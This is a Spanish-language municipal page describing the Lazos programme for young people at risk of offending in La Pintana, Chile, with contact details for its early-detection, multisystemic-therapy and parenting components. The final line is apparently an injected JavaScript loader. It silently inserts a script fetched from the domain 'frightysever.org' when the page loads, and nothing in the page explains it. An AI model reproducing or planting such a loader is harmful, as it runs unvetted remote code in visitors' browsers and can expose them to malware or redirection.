El programa Lazos es la oferta pública especializada en materia de prevención y reinserción social de la Subsecretaría de Prevención del Delito destinada a niños, niñas y adolescentes (entre 10 y 17 años) y sus respectivas familias. Su objetivo es reducir la probabilidad de ingreso de los y las jóvenes a unidades policiales cuando cometen un delito o una falta. Está compuesto de los programas Equipo de Detección Temprana (EDT); Terapia Multisistémica (MST), y Triple P.

Detección Temprana

Coordinadora: Belén Cárdenas Guajardo
Email: edtlazoslapintana@gmail.com
Teléfono: +56223896808
Dirección: Padre Pablo Laurín 1538 La función de este componente es oficiar como puerta de entrada del conjunto de casos que son informados a los Municipios por Carabineros de Chile (Convenio PSI 24 Horas), de los niños, niñas y adolescentes ingresados a las Comisarías y otras derivaciones de la red de infancia local por infracción de ley o conductas transgresoras.

Detección Temprana

Supervisora del Programa MST: Cecilia Barahona Chomali
Email: mstlapintana@gmail.com
Teléfono: +56223896857
Dirección: Padre Pablo Laurín 1538 Este es un tratamiento intensivo que aborda de manera integral los problemas conductuales asociados a transgresiones, factores de riesgo de reincidencia delictual e integración social de niños, niñas y jóvenes. Cuenta con un sistema de atención que se estructura en una modalidad 24 / 7, es decir, las 24 horas del día, los 7 días de la semana y se realiza en el hogar de las familias atendidas o en los contextos en los cuales se desenvuelven (escuelas, consultorios, familia extensa, entre otros), realizando sesiones de intervención clínica en domicilio todas las veces que sea necesario.

Triple P

Supervisora del Programa:
Email: mstlapintana@gmail.com
Teléfono: +56223896857
Dirección: Padre Pablo Laurín 1538 Su objetivo es apoyar, acompañar, orientar y educar a los padres, madres o cuidadores de los NNA, de la Comuna, en temáticas de Parentalidad Positiva. Se realizan intervenciones grupales de 8 sesiones con padres madres o cuidadores de adolescentes desde 12 hasta 18 años. Intervenciones individuales de 4 sesiones para padres, madres o cuidadores de niños de 0 a 12 años y adolescentes de 12 a 18 años. Se realizan seminarios, de carácter masivo y abierto a la comunidad en temáticas de parentalidad positiva, contando con 3 tipos de seminarios de niños 0 a 12 y 3 tipos de seminarios de Adolescentes.
;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P'); //]]>